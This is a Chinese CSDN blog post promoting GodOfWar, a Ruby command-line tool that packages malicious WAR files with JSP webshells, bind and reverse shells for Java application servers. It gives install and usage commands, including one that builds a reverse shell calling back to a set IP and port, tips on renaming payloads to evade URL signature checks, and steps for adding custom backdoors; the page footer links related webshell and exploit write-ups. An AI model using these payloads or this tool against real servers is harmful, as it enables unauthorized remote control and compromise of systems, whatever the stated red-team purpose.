可嵌入恶意Payload的JavaWAR构建工具GodOfWar

最新推荐文章于 2022-02-05 23:28:42 发布
最新推荐文章于 2022-02-05 23:28:42 发布
阅读量369 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TENCENTSYS/article/details/102544225
版权

GodOfWar采用Ruby开发,是一款专用于生成恶意WAR Payload的命令行工具,该工具仅限于渗透测试或红队研究使用。
功能介绍
1、 已嵌入的Payload(尝试命令-l/–list)

-cmd_get
-filebrowser
-bind_shell
-reverse_shell
-reverse_shell_ui
2、可配置的后门(尝试命令–host/–port)

3、Payload名称控制

-修改恶意Payload名称,绕过URL签名验证机制
工具安装
$ gem install godofwar
工具使用
$godofwar -h

Helpmenu:
-p, --payload PAYLOAD 利用已有Payload生成恶意WAR文件
(check-l/–list)
-H, --host IP_ADDR 设置指定Payload的本地或远程IP地址
(used with -p/–payload)
-P, --port PORT 设置指定Payload的本地或远程端口号
(usedwith -p/–payload)
-o, --output [FILE] 输出文件并设置开发名称
(default isthe payload original name. check ‘-l/–list’)
-l, --list 枚举所有可用的Payload
-h, --help 显示帮助信息
使用样例
枚举所有Payload:
$godofwar -l
├── cmd_get
│ └── Information:
│ ├── Description:Command execution via web interface
│ ├── OS: any
│ ├── Settings: {“false”=>“No Settingsrequired!”}
│ ├── Usage: http://host/cmd.jsp?cmd=whoami
│ ├── References: [“https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp”]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Information:
│ ├── Description: Remotefile browser, upload, download, unzip files and native command execution
│ ├── OS: any
│ ├── Settings: {“false”=>“No Settingsrequired!”}
│ ├── Usage: http://host/filebrowser.jsp
│ ├── References: [“http://www.vonloesch.de/filebrowser.html”]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Information:
│ ├── Description: TCPbind shell
│ ├── OS: any
│ ├── Settings: {“port”=>4444,“false”=>“No Settings required!”}
│ ├── Usage: http://host/reverse-shell.jsp
│ ├── References: [“Metasploit - msfvenom -pjava/jsp_shell_bind_tcp”]
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Information:
│ ├── Description: TCPreverse shell with a HTML form to set LHOST and LPORT from browser.
│ ├── OS: any
│ ├── Settings: {“host”=>“attacker”,“port”=>4444, “false”=>“No Settingsrequired!”}
│ ├── Usage: http://host/reverse_shell_ui.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Information:
│ ├── Description: TCPreverse shell. LHOST and LPORT are hardcoded
│ ├── OS: any
│ ├── Settings: {“host”=>“attacker”,“port”=>4444, “false”=>“No Settingsrequired!”}
│ ├── Usage: http://host/reverse_shell.jsp
│ ├── References: []
│ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
生成Payload并配置LHOST和LPORT:
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
开发完成之后,你可以进入(http://host:8080/puppy/puppy.jsp)来访问你的shell。

添加额外后门支持
1、 在payloads目录下创建一个新的文件夹。

2、 把自己开发的jsp文件存放到这个文件夹中。

3、 更新payloads_info.json文件中的下列参数:

-文件描述

-支持的操作系统(尽量覆盖所有操作系统)

-配置信息:默认主机和端口号

-引用:Payload的原始创建者信息

http://www.45zq.cn/portal/article/index/id/196.html

TENCENTSYS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
weblogic war部署完成后访问报404_weblogic系列漏洞整理 ———— 3. weblogic 后台提权...
weixin_39759270的博客
12-12 580
提权思路weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war,从而进行提权操作漏洞利用过程登陆weblogic后台http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装”在安装页面选择“上载文件”:在 “将部署上载到管理服务器” 区...
Tomcat后台部署war木马getshell
weixin_43071873的博客
11-06 6420
昨儿个面试被问到如何通过tomcat拿shell,之前只是看到,没做过复现,导致自己吃了亏,刚入渗透不久。复现的漏洞太少,经验方面还是远远不够的,一点一点来。复现过程可能比较粗糙,有什么错误还希望各位大哥给小弟指点一番。 靶场搭建: 百度一下,vulhub里边就有 漏洞复现: 进入靶场,找到后台。默认的话是在manager 准备好马,打war <%@ page language="java" contentType="text/html; charset=GBK" pageEncod
中间件漏洞小结
qq_43211396的博客
01-25 789
最近不准备挖SRC了,沉淀一下学学知识。 常见的web中间件 iis,apache,tomcat,nginx,jboss, Weblogic 1.1 PUT漏洞 IIS6.0 IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。 用burpsuite 提交OPTIONS 查看支持的协议 PUT /test.txt HTTP/1.1 Host: upload.moonteam.com Content-Length: 25 &
weblogic系列漏洞整理 ———— 3. weblogic 后台提权
Fly_鹏程万里
11-01 1964
提权思路 weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war,从而进行提权操作。 漏洞利用过程 登陆weblogic后台 http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装” 在安装页面选择“上载文件”: 在 “将部署上...
Shiro权限绕过漏洞
qq_42947816的博客
02-03 3078
在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造恶意Payload,可以绕过Shiro中对目录的权限限制
Payload.bin格式解+刷写工具
06-15
Payload.bin格式刷写工具工具非常方便 目前机型很多的官方卡刷里都是Payload.bin格式的卡刷 我们需要里面的某一个分区的haunt,使用这个工具非常简单就可以提取出来 也可以使用这个工具刷写 有需要的友友可以...
Fastboot模式刷写 Payload.bin格式工具 可视化图形
05-30
Fastboot模式刷写 Payload.bin格式工具 可视化图形 刷写Payload.bin格式的工具 方便简单 图形化操作界面 需要的友友使用
官方Payload.bin格式固件VAB镜像提取工具 完美好用+带教程
06-11
官方Payload.bin格式固件VAB镜像提取工具 完美好用+带教程 官方卡刷固件里分区目前都是Payload.bin格式的,以前都是使用其他解密工具先把官方解压出里面的Payload.bin文件在次解开其中的分区 此资源直接可以解...
payload-dumper-解
03-22
payload.bin文件,获取系统的相关.img文件。亲测有效。
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
Java war和解压命令
weixin_30460489的博客
03-16 226
涉及到JBoss不合理配置时,可以非授权访问jmx-console,这样就可以部署恶意war文件,得到JBoss服务器的webshell,进而可以进一步渗透得到服务器权限乃至内网漫游。 关于JBoss配置不当的攻击思路,网络上有许多相关的资料。可以参照链接:http://drops.wooyun.org/papers/178和http://www.hack80.c...
war启动命令_Oracle WebLogic远程命令执行0day漏洞(CVE-2019-2725补丁绕过)预警
weixin_39682673的博客
11-25 191
​​概述近日,奇安信天眼与安服团队通过数据监控发现,野外出现Oracle WebLogic远程命令执行漏洞最新利用代码,此攻击利用绕过了厂商今年4月底所发布的最新安全补丁(CVE-2019-2725)。由于该WAR在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造恶意 HTTP 请求,在未授权的情况下远程执行命令,获得目标服务器的权限。目前,该漏洞已出现野外的利用,但官方尚未给出相应的补...
DKMC ---- 恶意payload规避工具
You Never Known How Much I Love You
01-11 1911
DKMC是一个工具,生成混杂的shellcode存储在polyglot图像。 该图像是100%有效的,也是100%有效的shellcode。 这个做法是避免沙箱分析,因为它是一个简单的“合法”的形象。 目前该工具依靠PowerShell执行最终的shellcode有效载荷。 1.下载git clone https://github.com/Mr-Un1k0d3r/DKMC.git2.运行 cd /
将项目打War文件及在TomCat布署
长风 爱 跑步去
11-14 2613
今天帮一个新同事打一个样例工程,想到了我的Blog,就上来写写了:)要将一个工程打War的格式有好几种方法,在这我就介绍一种较简单的方法,用Jar 命令,前提条件是你的机子中要安装JDK具体步骤如下:1:在系统变量中加入变量JAVA_HOME,值为JDK的安装路径。2:在系统变量的classpath,加入值:%JAVA_HOME%lib;3:在系统变量的path,加入
Log4j2手把手的漏洞复现——简易版
IerkeU的博客
12-16 3357
漏洞简介 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息. 大多数情况下,开发人员可能会将用户输入导致的错误信息写入日志。攻击者可以利用该特性通过该漏洞构造特殊的数据请求,最终触发远程代码执行。 这个漏洞的利用可以分为这样的流程: 编写恶意代码 开启服务器 Web 服务 将恶意代码编译并挂起到 Web 服务上 构造恶意 payload ( ${jndi:ld.
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
小宇的web博客
02-05 6627
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550、Shiro-721 Shiro-550反序列漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对reme
Tomcat漏洞(弱口令war)详解
xinyue9966的博客
02-17 4754
后台弱口令上传war 影响版本:Tomcat版本:7.0–>8.0 影响说明:后台弱口令登录,上传webshell 环境说明:PHP5.5.38 、 Apache2.4.10、Tomcat 8.0.43 环境搭建 东塔靶场 漏洞原理 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上
vue3.2+ts+vite+admin 开发的admin管理系统模板
最新发布
05-07
vue3.2+ts+vite+admin 开发的admin管理系统模板
payload工具
05-15
Payload工具是一种用于分析和提取网络数据中的负载(Payload)的软件工具。网络数据是在计算机网络中用于传输信息的一种标准化格式,...总之,Payload工具是网络通信和信息安全领域中不可或缺的工具之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值